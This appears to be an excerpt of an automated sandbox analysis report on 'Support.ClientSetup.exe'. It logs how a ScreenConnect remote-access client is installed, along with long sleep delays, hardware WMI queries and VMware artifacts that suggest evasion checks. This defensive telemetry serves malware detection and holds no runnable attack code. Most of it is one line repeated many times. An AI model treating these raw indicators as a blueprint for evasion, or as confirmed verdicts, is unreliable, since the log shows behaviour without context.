                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 1C10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 3780000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 1C80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 6E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 64F0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 7E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 6E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: 9090000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: A090000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeMemory allocated: 1FE0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeMemory allocated: 21B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeMemory allocated: 2100000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeMemory allocated: 1AD30000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeMemory allocated: 1980000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeMemory allocated: 1B460000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI837B.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8195.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeAPI coverage: 1.6 %
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe TID: 6948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe TID: 6452Thread sleep count: 46 > 30Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe TID: 6648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 4192Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: svchost.exe, 0000000F.00000002.2315217035.000001FE46452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE46480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2315217035.000001FE46452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                  Source: svchost.exe, 0000000C.00000002.2317484244.000002796D82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2325000268.0000027972E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: svchost.exe, 0000000F.00000002.2312815530.000001FE46402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
